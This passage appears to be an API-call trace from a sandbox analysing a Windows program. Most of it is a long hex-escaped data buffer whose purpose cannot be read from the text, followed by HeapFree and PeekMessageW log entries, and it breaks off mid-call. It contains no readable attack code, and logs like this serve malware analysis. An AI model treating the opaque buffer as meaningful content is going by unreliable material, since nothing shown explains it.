ec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0208.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0208.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0208.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0208.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0208.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0208.110] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0208.110] PeekMessageW (in: 